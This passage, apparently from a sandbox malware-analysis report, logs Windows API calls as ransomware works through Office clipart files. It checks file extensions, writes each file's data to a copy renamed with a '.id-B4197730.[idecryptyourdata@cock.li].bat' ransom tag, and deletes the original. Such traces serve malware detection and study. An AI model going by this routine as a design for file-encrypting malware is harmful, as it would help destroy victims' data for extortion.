(lpString=".ppt") returned 4 [0182.879] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0182.879] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107154.WMF") returned 68 [0182.879] lstrlenW (lpString=".zip") returned 4 [0182.879] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0182.880] lstrlenW (lpString=".rar") returned 4 [0182.880] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0182.880] lstrlenW (lpString=".bz2") returned 4 [0182.880] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0182.880] lstrlenW (lpString=".7z") returned 3 [0182.880] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0182.880] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107154.WMF") returned 68 [0182.880] lstrlenW (lpString=".dbf") returned 4 [0182.880] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0182.880] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107154.WMF") returned 68 [0182.880] lstrlenW (lpString=".1cd") returned 4 [0182.880] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0182.880] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107154.WMF") returned 68 [0182.880] lstrlenW (lpString=".jpg") returned 4 [0182.880] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0182.880] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107154.WMF") returned 68 [0182.880] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107154.WMF") returned 68 [0182.880] lstrlenW (lpString=".doc") returned 4 [0182.880] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0182.880] lstrlenW (lpString=".docx") returned 5 [0182.880] lstrcmpiW (lpString1=".docx", lpString2="4.WMF") returned -1 [0182.880] lstrlenW (lpString=".pdf") returned 4 [0182.880] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0182.880] lstrlenW (lpString=".xls") returned 4 [0182.880] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0182.880] lstrlenW (lpString=".xlsx") returned 5 [0182.880] lstrcmpiW (lpString1=".xlsx", lpString2="4.WMF") returned -1 [0182.880] lstrlenW (lpString=".ppt") returned 4 [0182.880] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0182.880] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107154.WMF") returned 68 [0182.880] lstrlenW (lpString=".zip") returned 4 [0182.880] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0182.880] lstrlenW (lpString=".rar") returned 4 [0182.881] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0182.881] lstrlenW (lpString=".bz2") returned 4 [0182.881] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0182.881] lstrlenW (lpString=".7z") returned 3 [0182.881] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0182.881] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107154.WMF") returned 68 [0182.881] lstrlenW (lpString=".dbf") returned 4 [0182.881] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0182.881] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107154.WMF") returned 68 [0182.881] lstrlenW (lpString=".1cd") returned 4 [0182.881] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0182.881] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107154.WMF") returned 68 [0182.881] lstrlenW (lpString=".jpg") returned 4 [0182.881] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0182.881] lstrcmpiW (lpString1=".WMF", lpString2=".bat") returned 1 [0182.881] lstrlenW (lpString="J0107158.WMF") returned 12 [0182.881] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107158.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107158.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x360 [0182.882] GetFileSizeEx (in: hFile=0x360, lpFileSize=0x2fdff14 | out: lpFileSize=0x2fdff14*=24908) returned 1 [0182.882] CloseHandle (hObject=0x360) returned 1 [0182.882] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107158.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107158.wmf")) returned 0x220 [0182.882] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107158.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107158.wmf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0182.882] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107158.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107158.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x360 [0182.882] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0182.882] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0182.882] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107158.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107158.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x368 [0182.883] GetLastError () returned 0x0 [0182.883] ReadFile (in: hFile=0x360, lpBuffer=0x3b06020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fdfecc, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesRead=0x2fdfecc*=0x614c, lpOverlapped=0x0) returned 1 [0182.885] WriteFile (in: hFile=0x368, lpBuffer=0x3b06020*, nNumberOfBytesToWrite=0x6150, lpNumberOfBytesWritten=0x2fdfc94, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesWritten=0x2fdfc94*=0x6150, lpOverlapped=0x0) returned 1 [0182.886] ReadFile (in: hFile=0x360, lpBuffer=0x3b06020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fdfecc, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesRead=0x2fdfecc*=0x0, lpOverlapped=0x0) returned 1 [0182.886] WriteFile (in: hFile=0x368, lpBuffer=0x3b06020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2fdfc94, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesWritten=0x2fdfc94*=0xec, lpOverlapped=0x0) returned 1 [0182.886] SetEndOfFile (hFile=0x368) returned 1 [0182.886] CloseHandle (hObject=0x368) returned 1 [0182.886] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0182.886] SetEndOfFile (hFile=0x360) returned 1 [0182.887] CloseHandle (hObject=0x360) returned 1 [0182.887] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107158.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0182.888] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107158.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107158.wmf")) returned 1 [0182.888] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107158.WMF") returned 68 [0182.888] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107158.WMF") returned 68 [0182.888] lstrlenW (lpString=".doc") returned 4 [0182.888] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0182.888] lstrlenW (lpString=".docx") returned 5 [0182.888] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1 [0182.888] lstrlenW (lpString=".pdf") returned 4 [0182.888] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0182.888] lstrlenW (lpString=".xls") returned 4 [0182.888] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0182.888] lstrlenW (lpString=".xlsx") returned 5 [0182.888] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1 [0182.888] lstrlenW (lpString=".ppt") returned 4 [0182.888] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0182.888] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107158.WMF") returned 68 [0182.888] lstrlenW (lpString=".zip") returned 4 [0182.888] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0182.888] lstrlenW (lpString=".rar") returned 4 [0182.888] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0182.889] lstrlenW (lpString=".bz2") returned 4 [0182.889] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0182.889] lstrlenW (lpString=".7z") returned 3 [0182.889] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0182.889] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107158.WMF") returned 68 [0182.889] lstrlenW (lpString=".dbf") returned 4 [0182.889] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0182.889] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107158.WMF") returned 68 [0182.889] lstrlenW (lpString=".1cd") returned 4 [0182.889] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0182.889] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107158.WMF") returned 68 [0182.889] lstrlenW (lpString=".jpg") returned 4 [0182.889] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0182.889] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107158.WMF") returned 68 [0182.889] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107158.WMF") returned 68 [0182.889] lstrlenW (lpString=".doc") returned 4 [0182.889] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0182.889] lstrlenW (lpString=".docx") returned 5 [0182.889] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1 [0182.889] lstrlenW (lpString=".pdf") returned 4 [0182.889] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0182.889] lstrlenW (lpString=".xls") returned 4 [0182.889] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0182.889] lstrlenW (lpString=".xlsx") returned 5 [0182.889] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1 [0182.889] lstrlenW (lpString=".ppt") returned 4 [0182.889] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0182.889] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107158.WMF") returned 68 [0182.890] lstrlenW (lpString=".zip") returned 4 [0182.890] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0182.890] lstrlenW (lpString=".rar") returned 4 [0182.890] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0182.890] lstrlenW (lpString=".bz2") returned 4 [0182.890] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0182.890] lstrlenW (lpString=".7z") returned 3 [0182.890] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0182.890] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107158.WMF") returned 68 [0182.890] lstrlenW (lpString=".dbf") returned 4 [0182.890] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0182.890] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107158.WMF") returned 68 [0182.890] lstrlenW (lpString=".1cd") returned 4 [0182.890] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0182.890] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107158.WMF") returned 68 [0182.890] lstrlenW (lpString=".jpg") returned 4 [0182.890] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0182.890] lstrcmpiW (lpString1=".WMF", lpString2=".bat") returned 1 [0182.890] lstrlenW (lpString="J0107182.WMF") returned 12 [0182.890] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107182.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107182.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x360 [0182.891] GetFileSizeEx (in: hFile=0x360, lpFileSize=0x2fdff14 | out: lpFileSize=0x2fdff14*=16100) returned 1 [0182.891] CloseHandle (hObject=0x360) returned 1 [0182.891] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107182.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107182.wmf")) returned 0x220 [0182.891] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107182.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107182.wmf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0182.891] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107182.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107182.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x360 [0182.891] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0182.891] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0182.891] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107182.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107182.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x368 [0182.892] GetLastError () returned 0x0 [0182.892] ReadFile (in: hFile=0x360, lpBuffer=0x3b06020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fdfecc, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesRead=0x2fdfecc*=0x3ee4, lpOverlapped=0x0) returned 1 [0182.894] WriteFile (in: hFile=0x368, lpBuffer=0x3b06020*, nNumberOfBytesToWrite=0x3ef0, lpNumberOfBytesWritten=0x2fdfc94, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesWritten=0x2fdfc94*=0x3ef0, lpOverlapped=0x0) returned 1 [0182.895] ReadFile (in: hFile=0x360, lpBuffer=0x3b06020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fdfecc, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesRead=0x2fdfecc*=0x0, lpOverlapped=0x0) returned 1 [0182.895] WriteFile (in: hFile=0x368, lpBuffer=0x3b06020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2fdfc94, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesWritten=0x2fdfc94*=0xec, lpOverlapped=0x0) returned 1 [0182.895] SetEndOfFile (hFile=0x368) returned 1 [0182.895] CloseHandle (hObject=0x368) returned 1 [0182.895] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0182.895] SetEndOfFile (hFile=0x360) returned 1 [0182.896] CloseHandle (hObject=0x360) returned 1 [0182.896] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107182.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0182.896] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107182.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107182.wmf")) returned 1 [0182.897] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107182.WMF") returned 68 [0182.897] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107182.WMF") returned 68 [0182.897] lstrlenW (lpString=".doc") returned 4 [0182.897] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0182.897] lstrlenW (lpString=".docx") returned 5 [0182.897] lstrcmpiW (lpString1=".docx", lpString2="2.WMF") returned -1 [0182.897] lstrlenW (lpString=".pdf") returned 4 [0182.897] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0182.897] lstrlenW (lpString=".xls") returned 4 [0182.897] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0182.897] lstrlenW (lpString=".xlsx") returned 5 [0182.897] lstrcmpiW (lpString1=".xlsx", lpString2="2.WMF") returned -1 [0182.897] lstrlenW (lpString=".ppt") returned 4 [0182.897] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0182.897] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107182.WMF") returned 68 [0182.897] lstrlenW (lpString=".zip") returned 4 [0182.897] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0182.897] lstrlenW (lpString=".rar") returned 4 [0182.897] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0182.897] lstrlenW (lpString=".bz2") returned 4 [0182.897] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0182.897] lstrlenW (lpString=".7z") returned 3 [0182.897] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0182.897] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107182.WMF") returned 68 [0182.897] lstrlenW (lpString=".dbf") returned 4 [0182.897] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0182.897] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107182.WMF") returned 68 [0182.897] lstrlenW (lpString=".1cd") returned 4 [0182.897] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0182.897] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107182.WMF") returned 68 [0182.897] lstrlenW (lpString=".jpg") returned 4 [0182.897] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0182.898] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107182.WMF") returned 68 [0182.898] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107182.WMF") returned 68 [0182.898] lstrlenW (lpString=".doc") returned 4 [0182.898] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0182.898] lstrlenW (lpString=".docx") returned 5 [0182.898] lstrcmpiW (lpString1=".docx", lpString2="2.WMF") returned -1 [0182.898] lstrlenW (lpString=".pdf") returned 4 [0182.898] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0182.898] lstrlenW (lpString=".xls") returned 4 [0182.898] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0182.898] lstrlenW (lpString=".xlsx") returned 5 [0182.898] lstrcmpiW (lpString1=".xlsx", lpString2="2.WMF") returned -1 [0182.898] lstrlenW (lpString=".ppt") returned 4 [0182.898] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0182.898] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107182.WMF") returned 68 [0182.898] lstrlenW (lpString=".zip") returned 4 [0182.898] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0182.898] lstrlenW (lpString=".rar") returned 4 [0182.898] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0182.898] lstrlenW (lpString=".bz2") returned 4 [0182.898] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0182.898] lstrlenW (lpString=".7z") returned 3 [0182.898] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0182.898] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107182.WMF") returned 68 [0182.898] lstrlenW (lpString=".dbf") returned 4 [0182.898] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0182.898] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107182.WMF") returned 68 [0182.898] lstrlenW (lpString=".1cd") returned 4 [0182.898] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0182.898] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107182.WMF") returned 68 [0182.898] lstrlenW (lpString=".jpg") returned 4 [0182.898] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0182.898] lstrcmpiW (lpString1=".WMF", lpString2=".bat") returned 1 [0182.898] lstrlenW (lpString="J0107188.WMF") returned 12 [0182.899] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107188.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107188.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x360 [0182.899] GetFileSizeEx (in: hFile=0x360, lpFileSize=0x2fdff14 | out: lpFileSize=0x2fdff14*=4536) returned 1 [0182.899] CloseHandle (hObject=0x360) returned 1 [0182.899] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107188.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107188.wmf")) returned 0x220 [0182.899] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107188.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107188.wmf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0182.899] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107188.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107188.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x360 [0182.899] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0182.899] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0182.900] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107188.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107188.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x368 [0182.900] GetLastError () returned 0x0 [0182.900] ReadFile (in: hFile=0x360, lpBuffer=0x3b06020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fdfecc, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesRead=0x2fdfecc*=0x11b8, lpOverlapped=0x0) returned 1 [0183.264] WriteFile (in: hFile=0x368, lpBuffer=0x3b06020*, nNumberOfBytesToWrite=0x11c0, lpNumberOfBytesWritten=0x2fdfc94, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesWritten=0x2fdfc94*=0x11c0, lpOverlapped=0x0) returned 1 [0183.265] ReadFile (in: hFile=0x360, lpBuffer=0x3b06020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fdfecc, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesRead=0x2fdfecc*=0x0, lpOverlapped=0x0) returned 1 [0183.265] WriteFile (in: hFile=0x368, lpBuffer=0x3b06020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2fdfc94, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesWritten=0x2fdfc94*=0xec, lpOverlapped=0x0) returned 1 [0183.265] SetEndOfFile (hFile=0x368) returned 1 [0183.265] CloseHandle (hObject=0x368) returned 1 [0183.265] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0183.265] SetEndOfFile (hFile=0x360) returned 1 [0183.266] CloseHandle (hObject=0x360) returned 1 [0183.266] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107188.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0183.266] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107188.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107188.wmf")) returned 1 [0183.266] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107188.WMF") returned 68 [0183.266] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107188.WMF") returned 68 [0183.266] lstrlenW (lpString=".doc") returned 4 [0183.266] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0183.267] lstrlenW (lpString=".docx") returned 5 [0183.267] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1 [0183.267] lstrlenW (lpString=".pdf") returned 4 [0183.267] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0183.267] lstrlenW (lpString=".xls") returned 4 [0183.267] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0183.267] lstrlenW (lpString=".xlsx") returned 5 [0183.267] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1 [0183.267] lstrlenW (lpString=".ppt") returned 4 [0183.267] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0183.267] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107188.WMF") returned 68 [0183.267] lstrlenW (lpString=".zip") returned 4 [0183.267] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0183.267] lstrlenW (lpString=".rar") returned 4 [0183.267] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0183.267] lstrlenW (lpString=".bz2") returned 4 